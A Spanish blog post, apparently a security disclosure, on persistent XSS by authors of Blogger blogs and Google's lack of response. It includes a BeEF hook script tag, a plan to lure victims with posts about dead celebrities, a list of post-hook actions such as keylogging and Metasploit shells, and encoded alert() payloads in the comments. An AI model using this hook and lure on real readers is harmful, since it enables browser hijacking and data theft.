XSS es aceptable en blogger... arreglense navegantes!
Hace unos días cuando estaba investigando sobre XSS, se me ocurrió probar algunas cosas en blogger, estando prácticamente seguro de que iba a encontrar mucho... y así fue.

Si bien es sabido que blogger nos permite agregar todo tipo de JavaScript, uno podría pensar que hacen algún tipo de validación y eliminan ciertos ataques XSS... y la realidad es que, no lo hacen.

Hay que ser justos y comentar que si hacen controles en los comentarios, donde no es posible realizar éstos ataques, pero le da total libertad a el/los escrito/res del blog para insertar lo que tengan ganas.

Esto permite al blogger utilizar el blog como punto de ataque utilizando la confianza que pueden tener los lectores en un site como éste.
Realmente es muy fácil caer en blogs de blogger haciendo búsquedas en sites como google. Además blogger incorpora en todos los blogs un buscador de blogs, y el botón siguiente blog que nos lleva ciegamente a otros blogs.

Como recordarán de los artículos de XSS, entre los ataques más graves están el robo de cookies y utilizar el XSS Shell. El robo de cookies no es posible en blogger porque las cookies se manejan desde el site de google y hacen algunos artilugios para armar los IDs. Pero si es posible utilizar XSS Shell.

Utilizar algún framework como BeEF es tan simple como agregar el script <script language='Javascript' src="http://localhost/beef/hook/beefmagic.js.php"></script> en algún post.
En ese mismo post podríamos poner datos atractivos, como hablar de un famoso muerto recientemente... cualquiera que lea algún blog como el de TrendMicro sabe de cómo los cybercriminales envenenan los resultados de google utilizando algún dato hot como la muerte de famosos.
Ahora, un usuario que busca datos sobre dicho famoso quizás confíe más en un artículo de blogger que el de alguna página rara... es ahí donde está el problema con todo esto, la confianza del usuario en blogger y la poca bola que le da blogger al XSS persistente!

Una vez que las víctimas caen, qué podemos hacer? si leyeron mi anterior artículo sabrán que mucho, como ser:
- Obtener página actual
- Ejecutar JavaScript arbitrario
- Obtener los movimientos del mouse
- Obtener las teclas presionadas (keylogger)
- Crashear el browser
- Acceso a páginas a través de la víctima (proxy/tunneling)
- Obtener historial de páginas visitadas
- Escaneo distribuido de puertos
- Bindshell IPC (enviar comandos a otra máquina en la LAN de la máquina zombie)
- Utilizar exploits para lograr shells usando metasploit
- Otros.......

Cito el XSS Shell porque es el más abarcativo de los ataques XSS, así que piensen en que pueden hacer prácticamente cualquier cosa.

Qué dice google a todo esto? bueno en mi caso nada... les escribí hace dos semanas y como esperaba, no obtuve respuesta al respecto... les di tiempo antes de publicar esto aca, aunque no estoy contando nada que no se hubieran imaginado. Igual por las dudas esperé un tiempo razonable.

El que si tuvo más suerte fue RSnake. Bueno, al menos a un hacker tan conocido como RSnake le contestan, yo soy un simple entusiasta argentino =P
Igualmente la respuesta obtenida no fue muy alentadora. Básicamente lo que le dijeron a este famoso hacker fue: "el XSS en Google Apps es el comportamiento esperado". Básicamente ellos se ocupan de que no se puedan robar las cookies, todo lo demás es algo aceptado y se lavan las manos. El artículo completo lo pueden leer en XSS Hole In Google Apps Is "Expected Behavior". Como pueden observar, el artículo data del 2007 y todo sigue igual, así que no esperen muchos cambios en el futuro...

Cabe aclarar que este artículo está libre de XSS persistente, así que sigan navegando tranquilos... buuuuuu =P

4 comentarios:

Caeruleus dijo...

Interesante. Muy buen blog maestro

Anónimo dijo...

%3Cscript%3Ealert('jeje%2C%20el%20XSS%20en%20Google%20Apps%20es%20el%20comportamiento%20esperado%3F%3F%3F%20les%20importa%20un%20comino%20la%20seguridad%20de%20lo%20usuarios%20buuu!%20')%3C%2Fscript%3E

Anónimo dijo...

3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 6a 65 6a 65 20 6e 6f 20 6c 65 73 20 69 6d 70 6f 72 74 61 20 6c 61 20 73 65 67 75 72 69 64 61 64 20 64 65 20 6c 6f 73 20 75 73 75 61 72 69 6f 73 20 65 6e 20 72 65 61 6c 69 64 61 64 2c 20 62 75 65 6e 20 70 6f 73 74 20 61 6d 69 67 6f 27 29 3c 2f 73 63 72 69 70 74 3e

d3m4s1@d0v1v0 dijo...

Por suerte en los comentarios si escapan el XSS =D

Publicar un comentario